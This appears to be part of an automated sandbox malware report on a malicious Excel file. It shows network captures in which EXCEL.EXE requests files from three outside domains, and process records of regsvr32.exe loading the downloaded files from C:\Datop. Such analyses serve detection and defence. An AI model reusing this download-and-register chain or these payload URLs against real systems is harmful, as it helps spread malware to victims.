                    Oct 28, 2021 07:39:06.868724108 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:06.876574993 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:06.920861006 CEST44349167192.99.46.215192.168.2.22
                    Oct 28, 2021 07:39:07.937614918 CEST44349167192.99.46.215192.168.2.22
                    Oct 28, 2021 07:39:07.937802076 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:07.937824965 CEST44349167192.99.46.215192.168.2.22
                    Oct 28, 2021 07:39:07.937900066 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:07.938143015 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:07.938172102 CEST44349167192.99.46.215192.168.2.22
                    Oct 28, 2021 07:39:07.938235998 CEST49167443192.168.2.22192.99.46.215
                    Oct 28, 2021 07:39:07.938257933 CEST49167443192.168.2.22192.99.46.215

                    UDP Packets

                    TimestampSource PortDest PortSource IPDest IP
                    Oct 28, 2021 07:39:03.218375921 CEST5216753192.168.2.228.8.8.8
                    Oct 28, 2021 07:39:03.376092911 CEST53521678.8.8.8192.168.2.22
                    Oct 28, 2021 07:39:04.231115103 CEST5059153192.168.2.228.8.8.8
                    Oct 28, 2021 07:39:04.408379078 CEST53505918.8.8.8192.168.2.22
                    Oct 28, 2021 07:39:06.598665953 CEST5780553192.168.2.228.8.8.8
                    Oct 28, 2021 07:39:06.618042946 CEST53578058.8.8.8192.168.2.22

                    DNS Queries

                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                    Oct 28, 2021 07:39:03.218375921 CEST192.168.2.228.8.8.80x6519Standard query (0)maberic.comA (IP address)IN (0x0001)
                    Oct 28, 2021 07:39:04.231115103 CEST192.168.2.228.8.8.80xe4eaStandard query (0)ost.net.brA (IP address)IN (0x0001)
                    Oct 28, 2021 07:39:06.598665953 CEST192.168.2.228.8.8.80xa6bdStandard query (0)atochagaleria.com.arA (IP address)IN (0x0001)

                    DNS Answers

                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                    Oct 28, 2021 07:39:03.376092911 CEST8.8.8.8192.168.2.220x6519No error (0)maberic.com199.79.62.121A (IP address)IN (0x0001)
                    Oct 28, 2021 07:39:04.408379078 CEST8.8.8.8192.168.2.220xe4eaNo error (0)ost.net.br162.241.2.103A (IP address)IN (0x0001)
                    Oct 28, 2021 07:39:06.618042946 CEST8.8.8.8192.168.2.220xa6bdNo error (0)atochagaleria.com.ar192.99.46.215A (IP address)IN (0x0001)

                    HTTP Request Dependency Graph

                    • maberic.com
                    • ost.net.br
                    • atochagaleria.com.ar

                    HTTPS Proxied Packets

                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    0192.168.2.2249165199.79.62.121443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    2021-10-28 05:39:03 UTC0OUTGET /3XRJdBEjFc/l.html HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: maberic.com
                    Connection: Keep-Alive
                    2021-10-28 05:39:04 UTC0INHTTP/1.1 200 OK
                    Date: Thu, 28 Oct 2021 05:39:04 GMT
                    Server: nginx/1.19.5
                    Content-Type: text/html; charset=UTF-8
                    Content-Length: 0
                    X-Server-Cache: true
                    X-Proxy-Cache: HIT
                    Connection: close


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    1192.168.2.2249166162.241.2.103443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    2021-10-28 05:39:04 UTC0OUTGET /toXuNS00/l.html HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: ost.net.br
                    Connection: Keep-Alive
                    2021-10-28 05:39:06 UTC0INHTTP/1.1 200 OK
                    Date: Thu, 28 Oct 2021 05:39:04 GMT
                    Server: Apache
                    Upgrade: h2,h2c
                    Connection: Upgrade, close
                    Content-Length: 0
                    Content-Type: text/html; charset=UTF-8


                    Session IDSource IPSource PortDestination IPDestination PortProcess
                    2192.168.2.2249167192.99.46.215443C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    TimestampkBytes transferredDirectionData
                    2021-10-28 05:39:06 UTC1OUTGET /CnijALAyxR/l.html HTTP/1.1
                    Accept: */*
                    UA-CPU: AMD64
                    Accept-Encoding: gzip, deflate
                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Win64; x64; Trident/7.0; .NET CLR 2.0.50727; SLCC2; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)
                    Host: atochagaleria.com.ar
                    Connection: Keep-Alive
                    2021-10-28 05:39:07 UTC1INHTTP/1.1 200 OK
                    Date: Thu, 28 Oct 2021 05:39:11 GMT
                    Server: Apache
                    X-Powered-By: PHP/7.1.33
                    Cache-Control: max-age=2592000
                    Expires: Sat, 27 Nov 2021 05:39:11 GMT
                    Content-Length: 0
                    Connection: close
                    Content-Type: text/html; charset=UTF-8


                    Code Manipulations

                    Statistics

                    CPU Usage

                    Click to jump to process

                    Memory Usage

                    Click to jump to process

                    High Level Behavior Distribution

                    Click to dive into process behavior distribution

                    Behavior

                    Click to jump to process

                    System Behavior

                    General

                    Start time:07:38:14
                    Start date:28/10/2021
                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                    Wow64 process (32bit):false
                    Commandline:'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
                    Imagebase:0x13f0a0000
                    File size:28253536 bytes
                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:07:38:20
                    Start date:28/10/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test.test
                    Imagebase:0xfff20000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:07:38:21
                    Start date:28/10/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test1.test
                    Imagebase:0xfff20000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    General

                    Start time:07:38:21
                    Start date:28/10/2021
                    Path:C:\Windows\System32\regsvr32.exe
                    Wow64 process (32bit):false
                    Commandline:'C:\Windows\System32\regsvr32.exe' C:\Datop\test2.test
                    Imagebase:0xfff20000
                    File size:19456 bytes
                    MD5 hash:59BCE9F07985F8A4204F4D6554CFF708
                    Has elevated privileges:true
                    Has administrator privileges:true
                    Programmed in:C, C++ or other language
                    Reputation:high

                    Disassembly

                    Code Analysis

                    Reset < >